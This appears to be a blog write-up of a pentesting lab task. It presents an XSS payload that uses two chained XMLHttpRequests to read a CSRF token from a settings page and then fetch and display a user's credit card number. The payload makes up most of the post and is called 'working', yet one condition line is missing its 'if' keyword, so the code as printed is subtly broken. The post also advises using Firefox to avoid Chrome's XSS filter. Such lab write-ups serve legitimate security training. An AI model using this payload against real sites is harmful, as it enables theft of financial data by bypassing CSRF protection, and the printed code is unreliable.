XSS - Multilevel HTML parsing: JS for Pentesters task 19 write up

Nov 3, 2014 • jsp, javascript, xss, security-tube

writeup for task-19 of the JS for pentesters series by security-tube - Multilevel HTML parsing

In the last challenge we saw how can we receive and parse an HTML file that we get back as a result of a successful XMLHttpRequest(). But when we take it to the next level, things became a bit more difficult. Let us now see how to do a multilevel HTML parsing in order to solve a challenge.

JS for Pentesters task 19

Our objective is to Find John’s Credit Card Number using an XSS vulnerability on this page and Display the Credit Card Number in the div with id “result”.  Here the challenge is very easy but a bit time consuming to construct the correct payload. The working payload looks like this:

    <script>
        var xhr = new XMLHttpRequest();
        var xhr2 = new XMLHttpRequest();
        var csrf_token = '';
        var uid = '';    
        xhr2.onreadystatechange = function() {
             (xhr2.readyState == 4 && xhr2.status == 200) {
                var html = xhr2.responseXML;
                credit = html.getElementById("result").innerHTML;
                console.log(credit);
                document.getElementById("result").innerHTML = credit;
            }
        }
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                var html2 = xhr.responseXML;
                csrf_token = html2.forms[0].elements[1].value;
                alert(csrf_token);
                xhr2.open("GET", "/lab/webapp/jfp/19/getcreditcard?uid=" + uid + "&csrf_token=" + csrf_token, true);
                xhr2.responseType = "document";
                xhr2.send();
            }
        }
        var link = document.getElementById("settings");
        var uid = link.innerHTML.split(":")[1];
        xhr.open("GET", link.href, true);
        xhr.responseType = "document";
        xhr.send();
    </script>

What we are doing here is very simple. Since we have to parse multiple HTML page (to be precise, 2 HTML pages) we need to specify more than 1 XMLHttpRequests (2 to be precise). So we declared 2 XMLHttpRequest(), we called the first request and when it is successfully done, we call the 2nd one within the first one from which we will get the credit card number. Then we will use that number to display it in the “result” id in the main page.

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Product Security ♥ | CTF - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE